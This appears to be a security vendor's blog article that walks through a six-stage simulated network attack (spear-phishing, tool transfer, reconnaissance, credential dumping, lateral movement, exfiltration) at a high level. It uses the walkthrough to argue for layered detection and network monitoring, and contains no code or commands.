It's surprising that the majority of network attacks aren't overly complex or reliant on cutting-edge tools exploiting obscure vulnerabilities. Instead, they often leverage readily available tools and exploit multiple points of vulnerability. Through simulating a real-world network attack, security teams can assess their detection systems, ensure they have multiple defensive layers in place, and underscore the importance of network security to leadership.
This article showcases a practical attack scenario that could easily transpire in various systems. The attack simulation draws from the MITRE ATT&CK framework, Atomic Red Team, insights from Cato Networks' field experience, and public threat intelligence. Ultimately, we underscore the significance of adopting a comprehensive security strategy for safeguarding networks.
The Significance of Simulating a Real-world Network Assault
There are three key advantages to orchestrating a simulated real-world attack on your network:
1. Testing Detections: This enables you to verify the effectiveness of your detection systems in identifying and thwarting attacks. Such testing is crucial for combating common, everyday attacks, which constitute the bulk of cyber threats.
2. Highlighting the Need for Multiple Choke Points: Real attacks demonstrate that defense against cyber threats relies on multiple layers of defense. Rarely is an attack the result of a single point of failure, underscoring the necessity for a diverse array of detection mechanisms.
3. Demonstrating Network Monitoring's Importance to Leadership: Real attacks showcase how comprehensive network monitoring provides valuable insights into breaches, facilitating effective mitigation, remediation, and incident response strategies.
Attack Sequence Overview
The attack sequence outlined below comprises six fundamental steps:
1. Initial Access
2. Ingress Tool Transfer
3. Discovery
4. Credential Dumping
5. Lateral Movement and Persistence
6. Data Exfiltration
These steps are selected for their representation of common techniques pervasive in cyber attacks.
Now, let's delve into each step:
1. Initial Access
The attack commences with spear-phishing, establishing the initial entry point into the network. For instance, an email may be sent to an employee enticing them with a lucrative job offer. The email includes an attached file. In the background, the malicious attachment executes a macro, exploiting a remote code execution vulnerability in Microsoft Office using Hoaxshell, an open-source reverse shell tool.
According to Dolev Attiya, Staff Security Engineer for Threats at Cato Networks, "Implementing a defense-in-depth strategy could have proven beneficial as early as the initial access vector. Detection of the phishing email and Hoaxshell could have been achieved through various means, such as antivirus scanning at the email gateway, endpoint antivirus, or network visibility to identify command and control network artifacts generated by the malicious document. Employing multiple controls enhances the likelihood of detecting the attack.
2. Tool Ingress
After gaining initial access, the attacker proceeds to transfer various tools into the system to facilitate subsequent stages of the attack. These tools may include Powershell, Mimikatz, PSX, WMI, and other utilities that operate within the system's native environment.
Attiya elaborates, "Many of these tools are inherent to the Microsoft Windows framework and are typically utilized by administrators for system management. However, attackers can repurpose them for malicious activities."
3. Network Reconnaissance
Subsequently, the attacker conducts reconnaissance to identify valuable network resources such as services, systems, workstations, domain controllers, ports, additional credentials, active IPs, and more.
According to Attiya, "This phase resembles a tourist exploring a large city for the first time. The attacker gathers information akin to asking for directions, examining buildings, checking street signs, and familiarizing themselves with the surroundings.
4. Credential Harvesting
Once valuable resources are pinpointed, the previously deployed tools come into play to extract credentials from compromised systems. This action equips the attacker for lateral movement within the network.
5. Lateral Progression and Persistence
Armed with acquired credentials, the attacker traverses laterally across the network, accessing additional systems. The objective is to broaden their influence by infiltrating as many users and devices as possible, ideally with elevated privileges. This facilitates the search for sensitive data ripe for exfiltration. For instance, obtaining administrator credentials grants access to extensive portions of the network. Often, attackers proceed cautiously, scheduling tasks for later execution to evade detection. This stealthy progression enables attackers to maneuver within the network for extended periods, avoiding suspicion and identification.
Etay Maor, Senior Director of Security Strategy, underscores the prevalence and effectiveness of tools like Mimikatz, stating, "Mimikatz is ubiquitous. Its prowess in password extraction is unparalleled, and its decryption capabilities are swift, sometimes taking mere seconds. Mimikatz is utilized across the board, including by nation-state actors."
6. Data Extraction
Ultimately, the attacker identifies valuable data for extraction. This data may be transferred from the network to a cloud-based file-sharing system, encrypted for ransomware deployment, or utilized for other nefarious purposes.
Protecting Against Network Incursions
Efficiently safeguarding against attackers necessitates the implementation of multiple detection layers. Each security layer within the kill chain must be meticulously managed and seamlessly integrated to thwart attackers' efforts. This comprehensive approach anticipates and mitigates potential attacker maneuvers, bolstering overall security resilience.
